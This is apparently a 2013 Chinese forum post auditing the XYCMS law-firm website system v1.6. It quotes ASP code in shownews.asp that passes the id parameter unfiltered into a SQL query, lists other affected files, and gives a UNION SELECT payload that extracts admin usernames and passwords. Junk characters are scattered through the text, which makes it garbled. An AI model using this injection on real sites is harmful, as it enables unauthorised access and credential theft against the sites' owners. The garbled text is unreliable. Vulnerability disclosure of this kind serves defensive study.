前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
$ M, N0 u5 U- E2 b: W: v 8 J" l1 r) z! x( k3 m1 i' p
淫荡分割线
( H. k5 t8 }* p3 w-------------------------------------------------------- k( Z' t$ B4 i$ Y/ s' o+ D1 |2 X3 s
. C2 @7 o$ x6 ?4 k( Z: U+ d审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)+ S4 T1 K& Z0 o* K
源码地址:http://down.chinaz.com/soft/29233.htm
8 J Z6 O: A" G ; S+ V2 [7 U5 n4 e
漏洞文件:shownews.asp
- u* {0 x' n0 I7 j! R% [( I# s漏洞代码:7-13行
- @# @7 t V" p* P
8 Q& \$ x4 v' |6 m5 n" j% q
5 l8 _" }# x4 ]<% 8 @0 @ G" L2 r b! F
id=request.QueryString("id")
& p+ [" s0 N% e( I 8 h6 d( d7 l: ~3 ~) c
set snews=server.createobject("adodb.recordset")
$ h' a3 P# `- g, }( F6 t& jexec="select * from [news] where id="&id. Y# @. d3 n' d9 g# r8 L
snews.open exec,conn,1,10 L$ ?2 t/ i3 m% K5 N
%>; h$ J+ m1 f7 g6 } u
& h5 {- `* k: ?% ~. E
! o' e/ s( O- u: c
什么过滤都没有 直造成注入1 ~, L! h2 m8 A1 @8 q* O+ b& n! S
6 O C$ K' f5 J注入点:http://127.0.0.1:99/shownews.asp?id=xx
$ a! q4 U, C% |0 Q& T ( x* [* y3 a! b0 e
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
# u5 P. L( ^' p& f, l
+ J9 i6 ^* q5 r & o3 X' \0 [! ~. H) @5 k& w
exp: union select 1,admin,password,4,5,7 from admin_user
$ K4 E4 h; P2 q5 Q9 \& t, G
) u, w4 ?6 ]9 F |
发表于 2013-4-4 17:28:12
收藏
支持
反对